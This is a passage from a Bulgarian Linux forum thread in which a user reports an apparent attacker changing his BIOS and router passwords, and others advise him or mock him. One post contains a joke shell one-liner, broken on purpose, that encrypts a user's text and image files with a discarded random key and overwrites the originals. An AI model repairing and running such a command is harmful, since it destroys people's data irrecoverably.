Автор Тема: При стартиране компютърът иска парола  (Прочетена 25738 пъти)

malin

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #75 -: Jul 14, 2017, 20:05 »
Мен друго ме мъчи, щото съм тъп - защо праща по мейла, а не остави на плота директно едно readme със съдържание "следващата парола ще е бла-бла",  това си е загуба на време, както и да го погледнеш.
А как се казваше онова за раздвоено/разтроено съзнание, в което сам си си и вълк, и овца.
Активен

pgmgm

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #76 -: Jul 14, 2017, 20:19 »
Така най-лесно да се защитим от хакери....
/Има грешки в кода, че да не вземе да го пусне хакера, че бая рев ще има после :)/

Код:
for f in $(find ~/ -nme ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do oenssl des3 -k `tr -dc A-Za-z0-9_ < /dev/uradom | head -c 150 | xargs` -in $f -out $f.encrypted; echo “хахора гледа тук”>$f; done
Активен

pgmgm

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #77 -: Jul 14, 2017, 20:24 »
Мен друго ме мъчи, щото съм тъп - защо праща по мейла, а не остави на плота директно едно readme със съдържание "следващата парола ще е бла-бла",  това си е загуба на време, както и да го погледнеш.
А как се казваше онова за раздвоено/разтроено съзнание, в което сам си си и вълк, и овца.

Защото сменя БИОС паролата remote, и реално няма достъп до компютъра.
А когато БИОС-а няма парола - няма да му е кой знае какъв проблем да го направи.
А ако жертвата си слага всеки път една и съща парола или подобна на старата - няма да е много трудно да се brutrforce-не.
Аз съм сигурен, че ако сложи нещо от вида на gr^Pz.01td-zX проблемите ще приключат. Това се отнася и за рутерите, които ползва.


Ето пример: https://www.youtube.com/watch?v=d7PrB5Rs3pE


За Dell.... но предполагам методиката е подобна: https://www.youtube.com/watch?v=WDBz1QcG6r0

По-рано днес дадох връзка към две места, на които се обясняваше как паролата се сменя с Power Shell скрипт...  но кой да гледа.
« Последна редакция: Jul 14, 2017, 20:30 от pgmgm »
Активен

malin

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #78 -: Jul 14, 2017, 20:28 »
Помислих си го, но така много лесно и бързо свършва филма. Не ми харесва края.  ;)
Активен

ovcharin

  • Участници
  • ***
  • Публикации: 6
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #79 -: Jul 14, 2017, 22:58 »
Отдавна не бях влизал тук, Знаете как е, забравен мейла с регистрацията, а паролата кой ти я помни.
Но специално за тази - тема - истински се забавлявах!

Пич, дал си отговор на елемнтарни въпроси на 5-та страница от препирнята:) За мен това си е препирня и я водиш ти. Освен ако наистина пишеш дипломна по психология на тема "Издръжливоста на индивидите от OS обществото" ;) Колегите са били достатъчно учтиви. Честно казано, не ти разбирам проблема! То е по-скоро комично ;D
Без да се засягаш и без лоши чуства:)
Активен

malin

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #80 -: Jul 15, 2017, 00:30 »
Защото сменя БИОС паролата remote, и реално няма достъп до компютъра.

Аз не мисля, че филма свършва, защото
  - Етичния Хакер иска неетична сума, като не дава гаранция
  - Доставчика си прави антиреклама със действията си
  - Етичното помагане на колеги на принципа "клин клин избива", е ... етично
  - Биоса вече е направен на айрян, на ред е хард диска

Обаче нещо подобно се е случвало на един състезател на Монреал Канадиенс (ако се вярва на писанията му в един друг форум, е, леко подобни).
Активен

spec1a

  • Напреднали
  • *****
  • Публикации: 3837
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #81 -: Jul 15, 2017, 09:10 »
   "Освен ако наистина пишеш дипломна по психология"...
   По психиатрия ще да е.  ;D
   Това Юнг,Фройд и сие не важат  ;D
   Колкото и да сме добронамерени, едва ли описаното досега е възможно.
   Ето едно предложение от мен: нов компютър, пуска го (мрежовия кабел
е изваден), влиза в биоса, слага яка парола,гледа внимателно всички
настройки,касаещи мрежата (особено важно е да се забрани всяко
зареждане на ОС от мрежата,споменаха го и някои колеги),инсталира
някоя сериозна Линукс дистрибуция от DVD,рестартира,деактивира всички
излишни сървиси (не трябва да има отворени портове,това може да се
види с "netstat -lnp" ) след което слага мрежовия кабел,прави съотв.
настройки и това е...
   Дали компютъра тогава ще има "странно" поведение ?
Активен

spec1a

  • Напреднали
  • *****
  • Публикации: 3837
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #82 -: Jul 15, 2017, 09:14 »
   Само едно уточнение по писаното горе: може компютъра да не е нов,
просто трябва 100% да е сигурен, че няма зарази по него...
Активен

dsp250

  • Напреднали
  • *****
  • Публикации: 24
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #83 -: Jul 15, 2017, 10:34 »
Благодаря на всички,които добронамерено дадоха съветите  си.Не пиша  дисертация,тъй като ми остава още една година до пенсия.Това наистина прилича на филм,но и аз щях да му се радвам,ако не бях потърпевщия в продължение на 3 или 4 години вече.Жена ми си съсипа нервите,синът ми не смее да ползува Wi-и Fi и Bluethoth от телефона,когато си е в къщи,не смея да си сложа рутер и спокойно да седна в хола и да си ползувам безжичен нет!Моята професия е много далеч от компютрите и в продължение на години се принуждавам да се занимавам с това което не ми е работа.Инсталирах Линукс,защото си мислех,че така ще бъда повече защитен,но се оказа,че това вече не е така.
Много внимателно следя всеки отговор на участниците във форума и ако има нещо което не съм правил до сега го правя.Но не помага.Имам парола на Биоса,и не е елементарна,дори я сменям толкова често,че започнах да не помня коя е актуална.Забранил съм всякакъв отдалечен достъп до компютъра.Затворил съм портовете.Използувах nmap в Линукс и  Advanced port scanner с Уиндоус.Забранил съм  да отговаря на ping.
Снощи изключих мрежовия  кабел и ще чакам да видя да ли това ще има ефект.
По отношение на паролите който поставям на рутера: Не са елементарни.Когато четеш всеки ден в продължение на няколко години,все ще се научиш каква парола да сложиш.Правих филтриране по MAC адрес и Disable Router's PIN. Друго не знам какво да направя.
Стигало се е и до комични ситуации с рутерите -- Влизам в рутера и започвам да го конфигурирам.Кретена се закача безжично с рутера и много
бързо ми сменя менюто на арабски или еврит и аз започвам да гледам глупаво..
В последствие започнах да ги нося в работата и тук да ги настройвам,но и това не помага.По-късно поставих на мониторинг собствения си рутер
за да видя какво става и разбрах как го прави.Не използува таблици с пароли ,пинове и подобни.Затова успява толкова бързо
да ме съсипва.Няма да уточнявам как,който се е интересувал,ще се досети,защото нищо чудно да слухти и във форума.
Не живее в мойта кооперация,но е някъде в близост.Wi-Fi сигналът му е по-силен от моя,като се има в предвид,че рутера е на един метър от мен.
Опитвам се да му изградя профил,но не мога.Прави се на английско говорящ.Копира някакви безсмислени части от изречения,като ги наставя.
Има моменти в които си мисля,че е или дрогиран или психо.Но в същото време един дрогиран,няма как да прави такива неща,поне аз така си мисля.
Може на някои да им е смешно,но снощи смених дори клавиатурата и мишката.Следващото е,както някой ми препоръча е да си купя нов компютъра
и може би за по-сигурно да не използувам интернет.
И като се има в предвид,че нито съм богат,нито имам фирма,нито работя на някакво възлово място!Просто не съм интересен....
Но той не го прави само на мен,спортува с всеки с който си поиска.
За сега е това,ще чакам да видя,да ли нещо от това което съм променил ще има ефект.
Активен

spec1a

  • Напреднали
  • *****
  • Публикации: 3837
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #84 -: Jul 15, 2017, 11:03 »
   Добре де,пусни tcpdump, като му укажеш да записва мрежовия трафик
във файл, и после анализирай този файл.
   Вероятно е по-добре даже да укажеш tcpdump да се стартира при
пускане на компютъра ,непосредствено след зареждане на драйверите за
мрежовата карта (разгледай опциите на  systemctl ), и по някакъв начин
периодично този файл да се записва и на друго място.
   Разгледай после този файл внимателно,няма как хахора да скрие
някои важни метаданни ...
Активен

dsp250

  • Напреднали
  • *****
  • Публикации: 24
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #85 -: Jul 15, 2017, 11:16 »
   Добре де,пусни tcpdump, като му укажеш да записва мрежовия трафик
във файл, и после анализирай този файл.
   Вероятно е по-добре даже да укажеш tcpdump да се стартира при
пускане на компютъра ,непосредствено след зареждане на драйверите за
мрежовата карта (разгледай опциите на  systemctl ), и по някакъв начин
периодично този файл да се записва и на друго място.
   Разгледай после този файл внимателно,няма как хахора да скрие
някои важни метаданни ...
Благодаря,това не съм го правил.Довечера като се прибера ще го направя и ще пиша
Активен

pgmgm

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #86 -: Jul 15, 2017, 16:08 »
Цитат
Не използува таблици с пароли ,пинове и подобни.Затова успява толкова бързо
да ме съсипва.Няма да уточнявам как,който се е интересувал,ще се досети,защото нищо чудно да слухти и във форума.

Пак в същия дух - "знам как ама няма да ви кажа, досетете се сами", ама в същото време - искаш идеи как да го спреш?
Е, кажи как успява да хакне за секунди рутер (и то три различни рутера), които са конфигурирани извън "заразената" мрежа?

-------->
И... случайно да имаш нещо общо с "Optium" от форумите на калдата? Там има някакъв елемент с подобни проблеми - на него пък сигурно в продължение на 2 страници му обясняват как да си инсталира драйвери за уеб камера, а той не иска защото в драйверите можело да има вирус и хакерите да му включват камерата??? Стила на писане е ужасно подобен.
И той се представя за възрастен (пред пенсия), както и казва, че нищо не разбира и се самообучава по неволя, но в същото време - като му кажеш нещо не възприема, и си държи на своето. И е твърдо убеден, че в драйвеите за камерата има вируси!

https://www.kaldata.com/forums/topic/261763-инсталиране-на-нов-драйвер-за-web-camera-на-лаптоп/

А това тук кърти мивки:

https://www.kaldata.com/forums/topic/261545-неизпълнени-клаузи-в-договора-си-към-клиентите-от-страна-на-транснационалната-компания-viber/#comment-3653359

Купил вибер кредити, звънял на жената на мобилния, и после - що плащала тя роуминги :)
Но изказания от рода на:

Цитат
Не ценя като помощ вашите олигофренски и некомпетентни изказвания !

Смятам че сте млад и недодялан,

като се и надявам и живота  да ви "посмачка и очука" още,

след което сам ще си седнете на задника .

Ужасно приличат на това:

Цитат
Чудя се защо изобщо коментирате,като от всички те Ви изявлния става ясно че не разбирате за какво става дума!Точно като в казармата " Гранатомет и танк " ;D

И стилът на писане, изказът... много са подобни.
Забалежете например как на места има интервали преди препинателните знаци, другаде - няма интервали.
На места дори две изречения не са разделени с интервал.
Това неграмотно писане не е присъщо на по-старото поколение.
« Последна редакция: Jul 15, 2017, 16:09 от pgmgm »
Активен

malin

  • Гост
Re: При стартиране компютърът иска парола
« Отговор #87 -: Jul 15, 2017, 18:19 »
И последното - тука има рутер, тука няма рутер.

Разбира се, на "старото поколение", "което има акъл" е супер ясно, че на нов комп е "абсолютно невъзможно" да стават тия лоши неща. Същото е и с нов телефон и т.н. Но само ако са на  ;)

П.П. А ти си пиши, аз само откривам за момента противоречията в "логиката" ти, м-да, и отиваш да не помниш какво си писал, прегледай първо.
Активен

edmon

  • Напреднали
  • *****
  • Публикации: 44
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #88 -: Jul 15, 2017, 23:21 »
ebasimo i idiotite !!! :)
smqh se s glas....
hakera mu iskal 2800 ...hahahaha
abe ne be...
hahahah
Активен

ovcharin

  • Участници
  • ***
  • Публикации: 6
    • Профил
Re: При стартиране компютърът иска парола
« Отговор #89 -: Jul 16, 2017, 00:15 »
Кво станба сега?! Няма ли да има оше смях?! Или някой директно ше го бан? ::) ;D
Активен